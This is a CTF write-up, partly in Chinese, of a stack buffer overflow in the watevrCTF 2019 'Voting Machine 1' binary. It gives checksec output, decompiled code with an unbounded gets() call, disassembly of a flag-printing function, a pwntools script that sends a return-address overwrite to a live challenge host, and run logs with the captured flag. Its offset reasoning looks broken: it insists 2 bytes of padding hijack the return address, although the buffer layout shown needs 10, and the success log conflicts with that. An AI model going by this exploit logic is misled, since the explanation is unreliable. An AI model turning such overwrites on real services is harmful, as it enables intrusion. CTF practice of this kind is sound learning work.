checksec
┌──(root㉿Sonder)-[/mnt/d]
└─# checksec '[watevrCTF 2019]Voting Machine 1'
[*] '/mnt/d/[watevrCTF 2019]Voting Machine 1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
┌──(root㉿Sonder)-[/mnt/d]
└─# file '[watevrCTF 2019]Voting Machine 1'
[watevrCTF 2019]Voting Machine 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0e647f48bd36f15e866166910d10dd173fb0fcf6, not stripped
ida
// IDA pseudocode of the challenge binary's main: prints a banner, reads one
// line with gets() into a 2-byte stack buffer, and returns 0. This is the
// vulnerable entry point: gets() has no length bound, so input longer than
// v4 runs past it into the saved frame pointer and return address stored
// above it on the stack. The checksec output above (no canary, No PIE)
// means the overwrite is not detected and code addresses are fixed.
// Defensive fix: a bounded read such as fgets(v4, sizeof v4, stdin) into a
// suitably sized buffer, or compile with stack protector and PIE.
int __fastcall main(int argc, const char **argv, const char **envp)
{
char v4[2]; // [rsp+Eh] [rbp-2h] BYREF — stack-overflow target; author's note: only the 2-byte distance below rbp was used for the padding count
signal(14, (__sighandler_t)sig); // 14 == SIGALRM on Linux x86-64; sig is defined elsewhere in the binary
alarm(0x28u); // 40-second timeout: SIGALRM is delivered if input does not arrive in time
puts("Hello and welcome to \x1B[3mour\x1B[23m voting application!");
puts("Today's vote will be regarding the administration of");
puts("watevr CTF.");
puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.");
puts("Thanks!");
printf("Vote: ");
fflush(_bss_start); // presumably stdout; IDA resolved the symbol as _bss_start — TODO confirm
gets(v4); // dangerous function: unbounded read into a 2-byte buffer (the bug this writeup is about)
puts("Thanks for voting!");
return 0;
}
单击函数function区域->导航栏Search->search来搜索字符串,来寻找提权函数system,但是未找到,搜索flag
// Reads /home/ctf/flag.txt one byte at a time, echoes it to stdout and exits.
// main (above) never calls it; the writeup reaches it only by redirecting
// control to its fixed address (0x400807, see the disassembly below).
// Note: i is declared char while fgetc() returns int, so EOF is compared
// after truncation to char; with a signed char (x86-64 Linux) a 0xFF byte in
// the file would also terminate the loop early.
void __noreturn super_secret_function()
{
FILE *stream; // [rsp+0h] [rbp-10h]
char i; // [rsp+Fh] [rbp-1h] — fgetc() result truncated to char
stream = fopen("/home/ctf/flag.txt", "r");
if ( !stream )
{
puts("Cannot open flag.txt"); // flag file missing/unreadable: report and fail
exit(1);
}
for ( i = fgetc(stream); i != -1; i = fgetc(stream) ) // -1 is EOF as seen through char
putchar(i);
fclose(stream);
exit(0); // noreturn: the process ends here, control never returns to the caller
}
# 这里是通过字节流读取文件内容,并输出,所以将该函数的地址放到payload中就好
.text:0000000000400807
.text:0000000000400807 ; =============== S U B R O U T I N E =======================================
.text:0000000000400807
.text:0000000000400807 ; Attributes: noreturn bp-based frame
.text:0000000000400807
.text:0000000000400807 public super_secret_function
.text:0000000000400807 super_secret_function proc near
.text:0000000000400807
.text:0000000000400807 stream = qword ptr -10h
.text:0000000000400807 var_1 = byte ptr -1
.text:0000000000400807
.text:0000000000400807 ; __unwind {
.text:0000000000400807 push rbp
.text:0000000000400808 mov rbp, rsp
.text:000000000040080B sub rsp, 10h
.text:000000000040080F lea rsi, modes ; "r"
.text:0000000000400816 lea rdi, filename ; "/home/ctf/flag.txt"
.text:000000000040081D call _fopen
.text:0000000000400822 mov [rbp+stream], rax
.text:0000000000400826 cmp [rbp+stream], 0
.text:000000000040082B jnz short loc_400843
.text:000000000040082D lea rdi, s ; "Cannot open flag.txt"
.text:0000000000400834 call _puts
.text:0000000000400839 mov edi, 1 ; status
.text:000000000040083E call _exit
得知该函数的开始地址为400807
attack.py
from pwn import *
def attack5(url, port):
    """Connect to the challenge service at url:port and send the writeup's payload.

    The payload is the padding described in the writeup followed by the packed
    address 0x400807 of super_secret_function (fixed because the binary is
    No PIE); the session is then handed to the user interactively.
    """
    p = remote(url, port)
    payload = b'a'*(0x2)*1 + p64(0x400807)
    # The number of 'a' bytes in the payload should be 2 (the distance between
    # v4 and rbp in the decompiler comment), not 16 (the rbp-rsp distance).
    p.sendline(payload)
    p.interactive()
if __name__ == '__main__':
    # Connection parameters of the challenge instance used in this writeup.
    url = 'node1.anna.nssctf.cn'
    port = 28081
    attack5(url, port)
获取flag
payload = b'a'*(0x16)*1 + p64(0x400807)时的情况,也可以换成其它数字试试,暂时只有2是能成功劫持程序的
"C:\Program Files\Python3\python310\python.exe" D:\Code_pycharm\pwn_exp\VotingMachine_exp.py
[x] Opening connection to node1.anna.nssctf.cn on port 28081
[x] Opening connection to node1.anna.nssctf.cn on port 28081: Trying 43.143.7.97
[+] Opening connection to node1.anna.nssctf.cn on port 28081: Done
[*] Switching to interactive mode
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
payload = b'a'*(0x2)*1 + p64(0x400807)时的情况
"C:\Program Files\Python3\python310\python.exe" D:\Code_pycharm\pwn_exp\VotingMachine_exp.py
[x] Opening connection to node1.anna.nssctf.cn on port 28081
[x] Opening connection to node1.anna.nssctf.cn on port 28081: Trying 43.143.7.97
[+] Opening connection to node1.anna.nssctf.cn on port 28081: Done
[*] Switching to interactive mode
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: Thanks for voting!
NSSCTF{8acda60a-d894-4755-8e12-ce449607a746}
[*] Got EOF while reading in interactive
